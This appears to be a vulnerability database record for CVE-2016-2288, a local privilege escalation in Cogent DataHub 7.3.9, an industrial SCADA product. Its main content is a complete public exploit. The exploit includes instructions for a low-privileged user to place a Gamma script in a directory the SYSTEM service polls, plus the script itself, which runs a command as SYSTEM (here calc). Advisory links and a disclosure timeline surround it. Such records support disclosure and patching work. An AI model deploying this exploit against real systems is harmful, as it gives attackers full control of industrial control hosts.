ID
VAR-E-201603-0237
CVE
| cve_id: | CVE-2016-2288 | Trust: 2.7 |
EDB ID
39630
TITLE
Cogent Datahub 7.3.9 Gamma Script - Local Privilege Escalation - Windows local Exploit
Trust: 0.6
DESCRIPTION
Cogent Datahub 7.3.9 Gamma Script - Local Privilege Escalation. CVE-2016-2288 . local exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | cogent | model: | datahub gamma script | scope: | eq | version: | 7.3.9 | Trust: 1.0 |
| vendor: | cogent | model: | datahub | scope: | eq | version: | 7.3.9 | Trust: 0.5 |
EXPLOIT
/*
# Exploit Title: Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege Vulnerability
# Google Dork: lol
# Date: 28/3/2016
# Exploit Author: mr_me
# Vendor Homepage: http://www.cogentdatahub.com/
# Software Link: http://www.cogentdatahub.com/Contact_Form.html
# Version: <= 7.3.9
# Tested on: Windows 7 x86
# CVE : CVE‑2016-2288
sha1sum: c1806faf0225d0c7f96848cb9799b15f8b249792 CogentDataHub-7.3.9-150902-Windows.exe
Advsiory: https://ics-cert.us-cert.gov/advisories/ICSA-16-084-01
Timeline:
=========
- 02/12/2015 : vuln found, case opened to the zdi
- 09/02/2016 : case rejected (not interested in this vuln due to vector)
- 26/02/2016 : reported to ICS-CERT
- 24/03/2016 : advisory released
Notes:
======
- to reach SYSTEM, the service needs to be installed via the Service Manager
- the service doesnt need to be installed, as long as 'C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe' has been executed by a privileged user
- an attacker does NOT need to restart the machine or the service in order to EP, the service just polls for the Gamma Script
Exploitation:
=============
As a Guest user (or low privileged user) save this file as 'WebstreamSupport.g' into C:\usr\cogent\require\ and enjoy the free SYSTEM calcs. Most OS's dont allow
a write into c:\ as guest, but we are in the SCADA world. Anything is possible.
C:\Users\steven>sc qc "Cogent DataHub"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Cogent DataHub
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe" -H "C:\Users\steven\AppData\Roaming\Cogent DataHub"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Cogent DataHub
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
C:\Users\steven>
*/
require ("Application");
require ("AsyncRun"); // thanks to our friends @ Cogent
class WebstreamSupport Application
{
}
method WebstreamSupport.constructor ()
{
RunCommandAsync(nil, nil, "cmd.exe /c calc", "c:\\");
}
Webstream = ApplicationSingleton (WebstreamSupport);
Trust: 1.0
EXPLOIT LANGUAGE
g
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Local Privilege Escalation
Trust: 1.0
TAGS
| tag: | exploit | Trust: 0.5 |
CREDITS
mr_me
Trust: 0.6
EXTERNAL IDS
| db: | ICS CERT | id: | ICSA-16-084-01 | Trust: 3.3 |
| db: | NVD | id: | CVE-2016-2288 | Trust: 2.7 |
| db: | EXPLOIT-DB | id: | 39630 | Trust: 1.6 |
| db: | EDBNET | id: | 85122 | Trust: 0.6 |
| db: | EDBNET | id: | 85116 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 25137 | Trust: 0.6 |
| db: | EDBNET | id: | 85119 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 136460 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2016-2288 | Trust: 2.7 |
| url: | https://ics-cert.us-cert.gov/advisories/icsa-16-084-01 | Trust: 1.0 |
| url: | https://www.intelligentexploit.com | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/39630/ | Trust: 0.6 |
| url: | https://0day.today/exploits/25137 | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 136460 |
| db: | EXPLOIT-DB | id: | 39630 |
| db: | EDBNET | id: | 85122 |
| db: | EDBNET | id: | 85116 |
| db: | EDBNET | id: | 85119 |
LAST UPDATE DATE
2022-07-27T09:27:15.683000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 136460 | date: | 2016-03-28T23:40:48 |
| db: | EXPLOIT-DB | id: | 39630 | date: | 2016-03-28T00:00:00 |
| db: | EDBNET | id: | 85122 | date: | 2016-03-29T00:00:00 |
| db: | EDBNET | id: | 85116 | date: | 2016-03-28T00:00:00 |
| db: | EDBNET | id: | 85119 | date: | 2016-03-28T00:00:00 |